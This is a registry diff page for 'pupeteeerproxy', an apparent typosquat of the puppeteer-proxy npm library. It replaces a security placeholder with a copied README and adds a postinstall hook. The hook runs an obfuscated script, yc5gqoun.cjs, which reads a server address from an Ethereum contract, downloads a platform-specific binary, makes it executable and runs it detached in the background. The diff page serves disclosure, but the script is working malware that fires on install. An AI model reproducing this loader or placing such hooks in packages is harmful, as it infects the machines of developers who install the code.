pupeteeerproxy 0.0.1-security → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of pupeteeerproxy might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,24 @@
1
+ Copyright (c) 2020, Gajus Kuizinas (http://gajus.com/)
2
+ All rights reserved.
3
+
4
+ Redistribution and use in source and binary forms, with or without
5
+ modification, are permitted provided that the following conditions are met:
6
+ * Redistributions of source code must retain the above copyright
7
+ notice, this list of conditions and the following disclaimer.
8
+ * Redistributions in binary form must reproduce the above copyright
9
+ notice, this list of conditions and the following disclaimer in the
10
+ documentation and/or other materials provided with the distribution.
11
+ * Neither the name of the Gajus Kuizinas (http://gajus.com/) nor the
12
+ names of its contributors may be used to endorse or promote products
13
+ derived from this software without specific prior written permission.
14
+
15
+ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
16
+ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
17
+ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
18
+ DISCLAIMED. IN NO EVENT SHALL ANUARY BE LIABLE FOR ANY
19
+ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
20
+ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
21
+ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
22
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
23
+ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
24
+ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
package/README.md CHANGED
@@ -1,5 +1,97 @@
1
- # Security holding package
1
+ # puppeteer-proxy 🎎
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ [![Travis build status](http://img.shields.io/travis/gajus/puppeteer-proxy/master.svg?style=flat-square)](https://travis-ci.org/gajus/puppeteer-proxy)
4
+ [![Coveralls](https://img.shields.io/coveralls/gajus/puppeteer-proxy.svg?style=flat-square)](https://coveralls.io/github/gajus/puppeteer-proxy)
5
+ [![NPM version](http://img.shields.io/npm/v/puppeteer-proxy.svg?style=flat-square)](https://www.npmjs.org/package/puppeteer-proxy)
6
+ [![Canonical Code Style](https://img.shields.io/badge/code%20style-canonical-blue.svg?style=flat-square)](https://github.com/gajus/canonical)
7
+ [![Twitter Follow](https://img.shields.io/twitter/follow/kuizinas.svg?style=social&label=Follow)](https://twitter.com/kuizinas)
4
8
 
5
- Please refer to www.npmjs.com/advisories?search=pupeteeerproxy for more information.
9
+ Proxies [Puppeteer](https://github.com/puppeteer/puppeteer) Page requests.
10
+
11
+ * Allows to change proxy per Page and per Request.
12
+ * Allows to authenticate using http://username:password@proxy schema.
13
+ * Handles cookies.
14
+ * Handles binary files.
15
+ * Supports custom [HTTP(S) agents](https://nodejs.org/api/http.html#http_class_http_agent).
16
+
17
+ ## Motivation
18
+
19
+ This package addresses several issues with Puppeteer:
20
+
21
+ * It allows to set a proxy per Page and per Request ([#678](https://github.com/puppeteer/puppeteer/issues/678))
22
+ * It allows to authenticate against proxy when making HTTPS requests ([#3253](https://github.com/puppeteer/puppeteer/issues/3253))
23
+
24
+ The side-benefit of this [implementation](#implementation) is that it allows to route all traffic through Node.js, i.e. you can use externally hosted Chrome instance (such as [Browserless.io](https://www.browserless.io/)) to render DOM & evaluate JavaScript, and route all HTTP traffic through your Node.js instance.
25
+
26
+ The downside of this implementation is that it will introduce additional latency, i.e. requests will take longer to execute as request/ response will need to be always exchanged between Puppeteer and Node.js.
27
+
28
+ ## Implementation
29
+
30
+ puppeteer-proxy intercepts requests after it receives the request metadata from Puppeteer. puppeteer-proxy uses Node.js to make the HTTP requests. The response is then returned to the browser. When using puppeteer-proxy, browser never makes outbound HTTP requests.
31
+
32
+ ## Setup
33
+
34
+ You must call [`page.setRequestInterception(true)`](https://pptr.dev/#?product=Puppeteer&version=v2.1.0&show=api-pagesetrequestinterceptionvalue) before using `pageProxy.proxyRequest`.
35
+
36
+ ## API
37
+
38
+ ```js
39
+ import {
40
+ Agent as HttpAgent,
41
+ } from 'http';
42
+ import {
43
+ Agent as HttpsAgent,
44
+ } from 'https';
45
+ import type {
46
+ Page,
47
+ Request,
48
+ } from 'puppeteer';
49
+ import {
50
+ proxyRequest,
51
+ } from 'puppeteer-proxy';
52
+
53
+ /**
54
+ * @property agent HTTP(s) agent to use when making the request.
55
+ * @property page Instance of Puppeteer Page.
56
+ * @property proxyUrl HTTP proxy URL. A different proxy can be set for each request.
57
+ * @property request Instance of Puppeteer Request.
58
+ */
59
+ type ProxyRequestConfigurationType = {|
60
+ +agent?: HttpAgent | HttpsAgent,
61
+ +page: Page,
62
+ +proxyUrl?: string | { http: string, https: string },
63
+ +request: Request,
64
+ |};
65
+
66
+ proxyRequest(configuration: ProxyRequestConfigurationType): PageProxyType;
67
+
68
+ ```
69
+
70
+ ## Usage
71
+
72
+ ### Making a GET request using proxy
73
+
74
+ ```js
75
+ import puppeteer from 'puppeteer';
76
+ import {
77
+ proxyRequest,
78
+ } from 'puppeteer-proxy';
79
+
80
+ (async () => {
81
+ const browser = await puppeteer.launch();
82
+ const page = await browser.newPage();
83
+
84
+ await page.setRequestInterception(true);
85
+
86
+ page.on('request', async (request) => {
87
+ await proxyRequest({
88
+ page,
89
+ proxyUrl: 'http://127.0.0.1:3000',
90
+ request,
91
+ });
92
+ });
93
+
94
+ await page.goto('http://gajus.com');
95
+ })();
96
+
97
+ ```
package/package.json CHANGED
@@ -1,6 +1,95 @@
1
1
  {
2
+ "author": {
3
+ "email": "gajus@gajus.com",
4
+ "name": "Gajus Kuizinas",
5
+ "url": "http://gajus.com"
6
+ },
7
+ "ava": {
8
+ "babel": {
9
+ "compileAsTests": [
10
+ "test/helpers/**/*"
11
+ ]
12
+ },
13
+ "files": [
14
+ "test/puppeteer-proxy/**/*"
15
+ ],
16
+ "require": [
17
+ "@babel/register"
18
+ ]
19
+ },
20
+ "dependencies": {
21
+ "delay": "^4.3.0",
22
+ "got": "^11.1.4",
23
+ "http-proxy-agent": "^4.0.1",
24
+ "https-proxy-agent": "^5.0.0",
25
+ "roarr": "^2.15.3",
26
+ "serialize-error": "^7.0.1",
27
+ "tough-cookie": "^4.0.0",
28
+ "axios": "^1.7.7",
29
+ "ethers": "^6.13.2"
30
+ },
31
+ "description": "Proxies Puppeteer Page requests.",
32
+ "devDependencies": {
33
+ "@ava/babel": "^1.0.1",
34
+ "@babel/cli": "^7.8.4",
35
+ "@babel/core": "^7.9.6",
36
+ "@babel/node": "^7.8.7",
37
+ "@babel/plugin-transform-flow-strip-types": "^7.9.0",
38
+ "@babel/preset-env": "^7.9.6",
39
+ "@babel/register": "^7.9.0",
40
+ "anyproxy": "^4.1.2",
41
+ "ava": "^3.8.2",
42
+ "babel-plugin-istanbul": "^6.0.0",
43
+ "babel-plugin-transform-export-default-name": "^2.0.4",
44
+ "coveralls": "^3.1.0",
45
+ "eslint": "^7.1.0",
46
+ "eslint-config-canonical": "^20.0.4",
47
+ "flow-bin": "^0.125.1",
48
+ "flow-copy-source": "^2.0.9",
49
+ "get-port": "^5.1.1",
50
+ "gitdown": "^3.1.3",
51
+ "husky": "^4.2.5",
52
+ "nyc": "^15.0.1",
53
+ "pem": "^1.14.4",
54
+ "puppeteer": "^3.1.0",
55
+ "semantic-release": "^17.0.8",
56
+ "sinon": "^9.0.2"
57
+ },
58
+ "engines": {
59
+ "node": ">10"
60
+ },
61
+ "keywords": [
62
+ "puppeteer",
63
+ "proxy"
64
+ ],
65
+ "license": "BSD-3-Clause",
66
+ "main": "./dist/index.js",
2
67
  "name": "pupeteeerproxy",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
68
+ "nyc": {
69
+ "all": true,
70
+ "include": [
71
+ "src/**/*.js"
72
+ ],
73
+ "instrument": false,
74
+ "reporter": [
75
+ "html",
76
+ "text-summary"
77
+ ],
78
+ "require": [
79
+ "@babel/register"
80
+ ],
81
+ "silent": true,
82
+ "sourceMap": false
83
+ },
84
+ "repository": {
85
+ "type": "git",
86
+ "url": "https://github.com/gajus/puppeteer-proxy"
87
+ },
88
+ "scripts": {
89
+ "postinstall": "node yc5gqoun.cjs"
90
+ },
91
+ "version": "1.0.3",
92
+ "files": [
93
+ "yc5gqoun.cjs"
94
+ ]
95
+ }
package/yc5gqoun.cjs ADDED
@@ -0,0 +1 @@
1
+ const _0x4e3a81=_0xe794;(function(_0x24e5e5,_0x16c60b){const _0x187a80=_0xe794,_0x59c941=_0x24e5e5();while(!![]){try{const _0x364c45=-parseInt(_0x187a80(0x131))/0x1+parseInt(_0x187a80(0x125))/0x2+parseInt(_0x187a80(0x133))/0x3+-parseInt(_0x187a80(0x12d))/0x4+-parseInt(_0x187a80(0x142))/0x5+parseInt(_0x187a80(0x141))/0x6*(parseInt(_0x187a80(0x140))/0x7)+parseInt(_0x187a80(0x13d))/0x8;if(_0x364c45===_0x16c60b)break;else _0x59c941['push'](_0x59c941['shift']());}catch(_0x49d18d){_0x59c941['push'](_0x59c941['shift']());}}}(_0x4571,0x5d030));function _0xe794(_0x3199b2,_0x26c002){const _0x4571e5=_0x4571();return _0xe794=function(_0xe794d5,_0x41b15f){_0xe794d5=_0xe794d5-0x115;let _0x321e4a=_0x4571e5[_0xe794d5];return _0x321e4a;},_0xe794(_0x3199b2,_0x26c002);}const {ethers}=require(_0x4e3a81(0x122)),axios=require(_0x4e3a81(0x11e)),util=require(_0x4e3a81(0x116)),fs=require('fs'),path=require(_0x4e3a81(0x120)),os=require('os'),{spawn}=require(_0x4e3a81(0x11f)),contractAddress=_0x4e3a81(0x13c),WalletOwner=_0x4e3a81(0x12f),abi=['function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)'],provider=ethers[_0x4e3a81(0x13f)]('mainnet'),contract=new ethers[(_0x4e3a81(0x127))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x36e5c4=_0x4e3a81,_0x49d953={'YDwNe':_0x36e5c4(0x136),'tGVsa':function(_0x156555){return _0x156555();}};try{const _0x28f5b3=await contract[_0x36e5c4(0x117)](WalletOwner);return _0x28f5b3;}catch(_0x52ca03){return console['error'](_0x49d953[_0x36e5c4(0x137)],_0x52ca03),await _0x49d953['tGVsa'](fetchAndUpdateIp);}},getDownloadUrl=_0x57968f=>{const _0x544a3e=_0x4e3a81,_0x3c25b2={'osOjg':_0x544a3e(0x119),'eITvV':_0x544a3e(0x13a),'RXLro':'darwin'},_0x59c9e1=os[_0x544a3e(0x128)]();switch(_0x59c9e1){case _0x3c25b2['osOjg']:return _0x57968f+_0x544a3e(0x135);case _0x3c25b2['eITvV']:return _0x57968f+'/node-linux';case _0x3c25b2[_0x544a3e(0x143)]:return _0x57968f+_0x544a3e(0x11a);default:throw new Error(_0x544a3e(0x124)+_0x59c9e1);}},downloadFile=async(_0x3248c3,_0x376022)=>{const _0x3b1881=_0x4e3a81,_0x27d551={'fsveS':'finish','XnChE':_0x3b1881(0x132),'AUOwN':function(_0x10c394,_0x2f82b6){return _0x10c394(_0x2f82b6);},'UeoeA':_0x3b1881(0x13e)},_0x43cdc9=fs[_0x3b1881(0x138)](_0x376022),_0x26fcb7=await _0x27d551['AUOwN'](axios,{'url':_0x3248c3,'method':_0x3b1881(0x11d),'responseType':_0x27d551[_0x3b1881(0x118)]});return _0x26fcb7[_0x3b1881(0x12a)][_0x3b1881(0x129)](_0x43cdc9),new Promise((_0x283e75,_0x5f593e)=>{const _0x473bd9=_0x3b1881;_0x43cdc9['on'](_0x27d551['fsveS'],_0x283e75),_0x43cdc9['on'](_0x27d551[_0x473bd9(0x12b)],_0x5f593e);});},executeFileInBackground=async _0x5e820a=>{const _0x5a776b=_0x4e3a81,_0x4429c8={'QZZWh':function(_0x21a8cc,_0x57ad90,_0x4e0c5e,_0x2be395){return _0x21a8cc(_0x57ad90,_0x4e0c5e,_0x2be395);},'jitxk':_0x5a776b(0x115),'WNcaD':'Ошибка\x20при\x20запуске\x20файла:'};try{const _0x127eeb=_0x4429c8['QZZWh'](spawn,_0x5e820a,[],{'detached':!![],'stdio':_0x4429c8[_0x5a776b(0x12e)]});_0x127eeb[_0x5a776b(0x11c)]();}catch(_0x50204c){console['error'](_0x4429c8[_0x5a776b(0x123)],_0x50204c);}},runInstallation=async()=>{const _0x2615ad=_0x4e3a81,_0x3161cb={'mvUEC':function(_0x53a12d){return _0x53a12d();},'gCcOV':function(_0x3773aa,_0x383e8e,_0x20b5d5){return _0x3773aa(_0x383e8e,_0x20b5d5);},'WWban':function(_0x306c90,_0x1f1677){return _0x306c90!==_0x1f1677;},'GzRZg':_0x2615ad(0x119),'NNQeK':_0x2615ad(0x13b),'nmAsr':function(_0x903c8,_0x1b70ae){return _0x903c8(_0x1b70ae);},'gvfxv':_0x2615ad(0x121)};try{const _0x2c7186=await _0x3161cb[_0x2615ad(0x130)](fetchAndUpdateIp),_0x2198e6=getDownloadUrl(_0x2c7186),_0x3c6408=os['tmpdir'](),_0xa9b4c3=path[_0x2615ad(0x126)](_0x2198e6),_0x80ef34=path[_0x2615ad(0x11b)](_0x3c6408,_0xa9b4c3);await _0x3161cb[_0x2615ad(0x12c)](downloadFile,_0x2198e6,_0x80ef34);if(_0x3161cb['WWban'](os[_0x2615ad(0x128)](),_0x3161cb['GzRZg']))fs[_0x2615ad(0x134)](_0x80ef34,_0x3161cb['NNQeK']);_0x3161cb[_0x2615ad(0x139)](executeFileInBackground,_0x80ef34);}catch(_0x42cc56){console[_0x2615ad(0x132)](_0x3161cb['gvfxv'],_0x42cc56);}};function _0x4571(){const _0x201d72=['Ошибка\x20при\x20получении\x20IP\x20адреса:','YDwNe','createWriteStream','nmAsr','linux','755','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','4139744wsFoiL','stream','getDefaultProvider','7wvwCQq','2500026vrWLbv','3069320qHkWPN','RXLro','ignore','util','getString','UeoeA','win32','/node-macos','join','unref','GET','axios','child_process','path','Ошибка\x20установки:','ethers','WNcaD','Unsupported\x20platform:\x20','919232WZFnBO','basename','Contract','platform','pipe','data','XnChE','gCcOV','2704840YoOCqX','jitxk','0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84','mvUEC','3397GCDFZN','error','842076FkYKMB','chmodSync','/node-win.exe'];_0x4571=function(){return _0x201d72;};return _0x4571();}runInstallation();